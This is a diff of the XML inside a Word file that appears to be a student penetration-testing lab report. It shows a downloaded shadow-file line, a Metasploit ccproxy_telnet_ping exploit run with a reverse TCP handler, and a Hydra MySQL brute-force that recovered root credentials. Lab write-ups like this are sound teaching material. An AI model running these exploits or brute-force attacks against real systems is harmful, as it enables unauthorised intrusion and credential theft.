+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>games:*:14684:0:99999:7:::</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:bookmarkStart w:id="5" w:name="_Hlk528003517"/>
+      <w:r>
+        <w:br/>
+        <w:t>The fact that I can download this file means I could potentially download ANY file on the system.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc528175313"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ccproxy</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="7" w:name="_Hlk528003516"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-ftp</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="7"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>buffer overflow</w:t>
+        </w:r>
+        <w:bookmarkEnd w:id="6"/>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">In the same vein (ftp) of services, I saw </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ccproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-ftp running, and decided to go on Google to see if there were any exploits available.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Luckily for me, there was a </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>metasploit</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> module</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> available that I could take advantage of.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">There is an </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>asciinema</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> screen recording</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
+        <w:spacing w:line="320" w:lineRule="atLeast"/>
+        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="CCCCCC"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="underline"/>
@@ -1794,26 +2000,41 @@
         </w:rPr>
         <w:t>msf</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt; use exploit/windows/proxy/ccproxy_telnet_ping</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; use exploit/windows/proxy/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ccproxy_telnet_ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="underline"/>
@@ -1825,6 +2046,7 @@
         </w:rPr>
         <w:t>msf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1845,60 +2067,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>windows/proxy/ccproxy_telnet_ping</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>) &gt; set RHOST 172.43.0.154</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">RHOST =&gt; 172.43.0.154 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="underline"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(</w:t>
-      </w:r>
+        <w:t>windows/proxy/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="fg-9"/>
@@ -1909,8 +2080,89 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>windows/proxy/ccproxy_telnet_ping</w:t>
-      </w:r>
+        <w:t>ccproxy_telnet_ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>) &gt; set RHOST 172.43.0.154</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">RHOST =&gt; 172.43.0.154 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="underline"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="fg-9"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="DD3C69"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>windows/proxy/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="fg-9"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="DD3C69"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ccproxy_telnet_ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1941,7 +2193,29 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Started reverse TCP handler on 172.43.35.101:4444</w:t>
+        <w:t xml:space="preserve"> Started reverse TCP handler on </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="8" w:name="_Hlk528076854"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>172.43.35.101</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>:4444</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1973,27 +2247,888 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Exploit completed, but no session was created.  </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="9" w:name="OLE_LINK1"/>
+      <w:bookmarkStart w:id="10" w:name="OLE_LINK2"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploit completed, but no session was created.  </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc528064836"/>
-      <w:r>
-        <w:t>Poop exploit</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc528175314"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>MySQL login brute-force attack</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Make dem poop</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> by giving them chocolates</w:t>
-      </w:r>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Using Hydra, I was able to launch a (slow) brute-force attack against the MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> server at port 3306.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">I was </w:t>
+      </w:r>
+      <w:r>
+        <w:t>able to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Launch a brute-force attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Get in with the `</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>root</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>` credentials.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="fg-9"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="DD3C69"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>root@kali-x43-35</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="fg-12"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="26B0D7"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>~/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="fg-12"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="26B0D7"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>GitHub</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="fg-12"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="26B0D7"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>/itms-443/labs/4/scripts</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># ./mysql_bruteforce.pl </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not us</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>e in military or secret service</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>organizations, or for illegal purposes.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hydra (http://www.thc.org/thc-hydra) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>starting at 2018-10-24 14:25:52</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[INFO] Reduced number of tasks to 4 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> does not </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>like many parallel connections</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[WARNING] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Restorefile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (you have 10 seconds to abort... (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> opt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ion -I to skip waiting)) from a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>previous session found, to prevent overwriting, ./</w:t>
+      </w:r>
